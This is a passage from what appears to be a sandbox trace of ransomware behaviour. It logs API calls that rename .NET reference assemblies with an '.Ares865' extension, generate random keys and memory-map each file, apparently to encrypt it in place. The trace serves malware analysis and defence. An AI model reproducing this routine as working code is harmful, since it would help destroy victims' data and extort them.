dwFlags=0x0) returned 1 [0123.248] lstrcpyW (in: lpString1=0x2cce48a, lpString2="System.ComponentModel.DataAnnotations.dll" | out: lpString1="System.ComponentModel.DataAnnotations.dll") returned="System.ComponentModel.DataAnnotations.dll" [0123.249] lstrlenW (lpString="System.ComponentModel.DataAnnotations.dll") returned 41 [0123.249] lstrlenW (lpString="Ares865") returned 7 [0123.249] lstrcmpiW (lpString1="ons.dll", lpString2="Ares865") returned 1 [0123.249] lstrlenW (lpString=".dll") returned 4 [0123.249] lstrcmpiW (lpString1="System.ComponentModel.DataAnnotations.dll", lpString2=".dll") returned 1 [0123.249] lstrlenW (lpString=".lnk") returned 4 [0123.249] lstrcmpiW (lpString1="System.ComponentModel.DataAnnotations.dll", lpString2=".lnk") returned 1 [0123.249] lstrlenW (lpString=".ini") returned 4 [0123.249] lstrcmpiW (lpString1="System.ComponentModel.DataAnnotations.dll", lpString2=".ini") returned 1 [0123.249] lstrlenW (lpString=".sys") returned 4 [0123.249] lstrcmpiW (lpString1="System.ComponentModel.DataAnnotations.dll", lpString2=".sys") returned 1 [0123.249] lstrlenW (lpString="System.ComponentModel.DataAnnotations.dll") returned 41 [0123.249] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ComponentModel.DataAnnotations.dll.Ares865") returned 118 [0123.249] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ComponentModel.DataAnnotations.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.componentmodel.dataannotations.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ComponentModel.DataAnnotations.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.componentmodel.dataannotations.dll.ares865"), dwFlags=0x1) returned 1 [0123.251] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ComponentModel.DataAnnotations.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.componentmodel.dataannotations.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0123.252] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=57344) returned 1 [0123.252] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0123.253] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0123.253] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.253] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe300, lpName=0x0) returned 0x170 [0123.254] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe300) returned 0x190000 [0123.258] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0123.259] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0123.259] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.260] lstrcpyW (in: lpString1=0x2cce48a, lpString2="System.Core.dll" | out: lpString1="System.Core.dll") returned="System.Core.dll" [0123.260] lstrlenW (lpString="System.Core.dll") returned 15 [0123.260] lstrlenW (lpString="Ares865") returned 7 [0123.260] lstrcmpiW (lpString1="ore.dll", lpString2="Ares865") returned 1 [0123.260] lstrlenW (lpString=".dll") returned 4 [0123.260] lstrcmpiW (lpString1="System.Core.dll", lpString2=".dll") returned 1 [0123.260] lstrlenW (lpString=".lnk") returned 4 [0123.260] lstrcmpiW (lpString1="System.Core.dll", lpString2=".lnk") returned 1 [0123.260] lstrlenW (lpString=".ini") returned 4 [0123.260] lstrcmpiW (lpString1="System.Core.dll", lpString2=".ini") returned 1 [0123.260] lstrlenW (lpString=".sys") returned 4 [0123.260] lstrcmpiW (lpString1="System.Core.dll", lpString2=".sys") returned 1 [0123.260] lstrlenW (lpString="System.Core.dll") returned 15 [0123.261] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Core.dll.Ares865") returned 92 [0123.261] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Core.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.core.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Core.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.core.dll.ares865"), dwFlags=0x1) returned 1 [0123.262] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Core.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.core.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0123.263] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=667648) returned 1 [0123.263] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0123.264] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0123.264] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.264] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa3300, lpName=0x0) returned 0x170 [0123.265] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa3300) returned 0xdd0000 [0123.293] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0123.294] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0123.294] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.303] lstrcpyW (in: lpString1=0x2cce48a, lpString2="System.Data.DataSetExtensions.dll" | out: lpString1="System.Data.DataSetExtensions.dll") returned="System.Data.DataSetExtensions.dll" [0123.303] lstrlenW (lpString="System.Data.DataSetExtensions.dll") returned 33 [0123.303] lstrlenW (lpString="Ares865") returned 7 [0123.303] lstrcmpiW (lpString1="ons.dll", lpString2="Ares865") returned 1 [0123.303] lstrlenW (lpString=".dll") returned 4 [0123.303] lstrcmpiW (lpString1="System.Data.DataSetExtensions.dll", lpString2=".dll") returned 1 [0123.303] lstrlenW (lpString=".lnk") returned 4 [0123.303] lstrcmpiW (lpString1="System.Data.DataSetExtensions.dll", lpString2=".lnk") returned 1 [0123.303] lstrlenW (lpString=".ini") returned 4 [0123.303] lstrcmpiW (lpString1="System.Data.DataSetExtensions.dll", lpString2=".ini") returned 1 [0123.303] lstrlenW (lpString=".sys") returned 4 [0123.303] lstrcmpiW (lpString1="System.Data.DataSetExtensions.dll", lpString2=".sys") returned 1 [0123.303] lstrlenW (lpString="System.Data.DataSetExtensions.dll") returned 33 [0123.304] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.DataSetExtensions.dll.Ares865") returned 110 [0123.304] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.DataSetExtensions.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.datasetextensions.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.DataSetExtensions.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.datasetextensions.dll.ares865"), dwFlags=0x1) returned 1 [0123.306] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.DataSetExtensions.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.datasetextensions.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0123.306] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=53248) returned 1 [0123.306] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0123.307] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0123.307] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.307] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd300, lpName=0x0) returned 0x170 [0123.309] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd300) returned 0x190000 [0123.312] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0123.312] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0123.312] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.314] lstrcpyW (in: lpString1=0x2cce48a, lpString2="System.Data.Entity.Design.dll" | out: lpString1="System.Data.Entity.Design.dll") returned="System.Data.Entity.Design.dll" [0123.314] lstrlenW (lpString="System.Data.Entity.Design.dll") returned 29 [0123.314] lstrlenW (lpString="Ares865") returned 7 [0123.314] lstrcmpiW (lpString1="ign.dll", lpString2="Ares865") returned 1 [0123.314] lstrlenW (lpString=".dll") returned 4 [0123.314] lstrcmpiW (lpString1="System.Data.Entity.Design.dll", lpString2=".dll") returned 1 [0123.314] lstrlenW (lpString=".lnk") returned 4 [0123.314] lstrcmpiW (lpString1="System.Data.Entity.Design.dll", lpString2=".lnk") returned 1 [0123.314] lstrlenW (lpString=".ini") returned 4 [0123.314] lstrcmpiW (lpString1="System.Data.Entity.Design.dll", lpString2=".ini") returned 1 [0123.314] lstrlenW (lpString=".sys") returned 4 [0123.314] lstrcmpiW (lpString1="System.Data.Entity.Design.dll", lpString2=".sys") returned 1 [0123.314] lstrlenW (lpString="System.Data.Entity.Design.dll") returned 29 [0123.314] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.Design.dll.Ares865") returned 106 [0123.315] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.Design.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.entity.design.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.Design.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.entity.design.dll.ares865"), dwFlags=0x1) returned 1 [0123.316] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.Design.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.entity.design.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0123.316] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=229376) returned 1 [0123.317] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0123.317] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0123.317] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.317] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x38300, lpName=0x0) returned 0x170 [0123.319] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x38300) returned 0x420000 [0123.329] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0123.330] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0123.330] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.333] lstrcpyW (in: lpString1=0x2cce48a, lpString2="System.Data.Entity.dll" | out: lpString1="System.Data.Entity.dll") returned="System.Data.Entity.dll" [0123.333] lstrlenW (lpString="System.Data.Entity.dll") returned 22 [0123.333] lstrlenW (lpString="Ares865") returned 7 [0123.333] lstrcmpiW (lpString1="ity.dll", lpString2="Ares865") returned 1 [0123.333] lstrlenW (lpString=".dll") returned 4 [0123.333] lstrcmpiW (lpString1="System.Data.Entity.dll", lpString2=".dll") returned 1 [0123.333] lstrlenW (lpString=".lnk") returned 4 [0123.334] lstrcmpiW (lpString1="System.Data.Entity.dll", lpString2=".lnk") returned 1 [0123.334] lstrlenW (lpString=".ini") returned 4 [0123.334] lstrcmpiW (lpString1="System.Data.Entity.dll", lpString2=".ini") returned 1 [0123.334] lstrlenW (lpString=".sys") returned 4 [0123.334] lstrcmpiW (lpString1="System.Data.Entity.dll", lpString2=".sys") returned 1 [0123.334] lstrlenW (lpString="System.Data.Entity.dll") returned 22 [0123.334] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.dll.Ares865") returned 99 [0123.334] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.entity.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.entity.dll.ares865"), dwFlags=0x1) returned 1 [0123.335] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.entity.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0123.336] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2879488) returned 1 [0123.336] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0123.337] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0123.337] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.337] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2bf300, lpName=0x0) returned 0x170 [0123.338] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x200000, dwNumberOfBytesToMap=0xbf300) returned 0xdd0000 [0123.473] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0123.474] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0123.474] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.490] lstrcpyW (in: lpString1=0x2cce48a, lpString2="System.Data.Linq.dll" | out: lpString1="System.Data.Linq.dll") returned="System.Data.Linq.dll" [0123.490] lstrlenW (lpString="System.Data.Linq.dll") returned 20 [0123.490] lstrlenW (lpString="Ares865") returned 7 [0123.490] lstrcmpiW (lpString1="inq.dll", lpString2="Ares865") returned 1 [0123.490] lstrlenW (lpString=".dll") returned 4 [0123.490] lstrcmpiW (lpString1="System.Data.Linq.dll", lpString2=".dll") returned 1 [0123.490] lstrlenW (lpString=".lnk") returned 4 [0123.490] lstrcmpiW (lpString1="System.Data.Linq.dll", lpString2=".lnk") returned 1 [0123.490] lstrlenW (lpString=".ini") returned 4 [0123.491] lstrcmpiW (lpString1="System.Data.Linq.dll", lpString2=".ini") returned 1 [0123.491] lstrlenW (lpString=".sys") returned 4 [0123.491] lstrcmpiW (lpString1="System.Data.Linq.dll", lpString2=".sys") returned 1 [0123.491] lstrlenW (lpString="System.Data.Linq.dll") returned 20 [0123.491] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Linq.dll.Ares865") returned 97 [0123.491] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Linq.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.linq.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Linq.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.linq.dll.ares865"), dwFlags=0x1) returned 1 [0123.493] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Linq.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.linq.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0123.493] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=684032) returned 1 [0123.494] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0123.494] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0123.494] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.495] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa7300, lpName=0x0) returned 0x170 [0123.496] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa7300) returned 0xdd0000 [0123.539] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0123.540] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0123.540] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.550] lstrcpyW (in: lpString1=0x2cce48a, lpString2="System.Data.Services.Client.dll" | out: lpString1="System.Data.Services.Client.dll") returned="System.Data.Services.Client.dll" [0123.550] lstrlenW (lpString="System.Data.Services.Client.dll") returned 31 [0123.550] lstrlenW (lpString="Ares865") returned 7 [0123.550] lstrcmpiW (lpString1="ent.dll", lpString2="Ares865") returned 1 [0123.550] lstrlenW (lpString=".dll") returned 4 [0123.550] lstrcmpiW (lpString1="System.Data.Services.Client.dll", lpString2=".dll") returned 1 [0123.550] lstrlenW (lpString=".lnk") returned 4 [0123.550] lstrcmpiW (lpString1="System.Data.Services.Client.dll", lpString2=".lnk") returned 1 [0123.551] lstrlenW (lpString=".ini") returned 4 [0123.551] lstrcmpiW (lpString1="System.Data.Services.Client.dll", lpString2=".ini") returned 1 [0123.551] lstrlenW (lpString=".sys") returned 4 [0123.551] lstrcmpiW (lpString1="System.Data.Services.Client.dll", lpString2=".sys") returned 1 [0123.551] lstrlenW (lpString="System.Data.Services.Client.dll") returned 31 [0123.551] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Client.dll.Ares865") returned 108 [0123.551] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Client.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.services.client.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Client.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.services.client.dll.ares865"), dwFlags=0x1) returned 1 [0123.554] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Client.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.services.client.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0123.554] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=462848) returned 1 [0123.554] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0123.555] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0123.555] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.555] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x71300, lpName=0x0) returned 0x170 [0123.557] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x71300) returned 0x420000 [0123.648] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0123.649] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0123.649] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.656] lstrcpyW (in: lpString1=0x2cce48a, lpString2="System.Data.Services.Design.dll" | out: lpString1="System.Data.Services.Design.dll") returned="System.Data.Services.Design.dll" [0123.656] lstrlenW (lpString="System.Data.Services.Design.dll") returned 31 [0123.656] lstrlenW (lpString="Ares865") returned 7 [0123.656] lstrcmpiW (lpString1="ign.dll", lpString2="Ares865") returned 1 [0123.656] lstrlenW (lpString=".dll") returned 4 [0123.656] lstrcmpiW (lpString1="System.Data.Services.Design.dll", lpString2=".dll") returned 1 [0123.656] lstrlenW (lpString=".lnk") returned 4 [0123.656] lstrcmpiW (lpString1="System.Data.Services.Design.dll", lpString2=".lnk") returned 1 [0123.656] lstrlenW (lpString=".ini") returned 4 [0123.656] lstrcmpiW (lpString1="System.Data.Services.Design.dll", lpString2=".ini") returned 1 [0123.656] lstrlenW (lpString=".sys") returned 4 [0123.656] lstrcmpiW (lpString1="System.Data.Services.Design.dll", lpString2=".sys") returned 1 [0123.656] lstrlenW (lpString="System.Data.Services.Design.dll") returned 31 [0123.657] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Design.dll.Ares865") returned 108 [0123.657] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Design.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.services.design.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Design.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.services.design.dll.ares865"), dwFlags=0x1) returned 1 [0123.659] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Design.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.services.design.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0123.659] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=163840) returned 1 [0123.660] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0123.660] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0123.660] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.661] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x28300, lpName=0x0) returned 0x170 [0123.664] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x28300) returned 0x420000 [0123.684] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0123.685] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0123.685] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.688] lstrcpyW (in: lpString1=0x2cce48a, lpString2="System.Data.Services.dll" | out: lpString1="System.Data.Services.dll") returned="System.Data.Services.dll" [0123.688] lstrlenW (lpString="System.Data.Services.dll") returned 24 [0123.688] lstrlenW (lpString="Ares865") returned 7 [0123.688] lstrcmpiW (lpString1="ces.dll", lpString2="Ares865") returned 1 [0123.688] lstrlenW (lpString=".dll") returned 4 [0123.688] 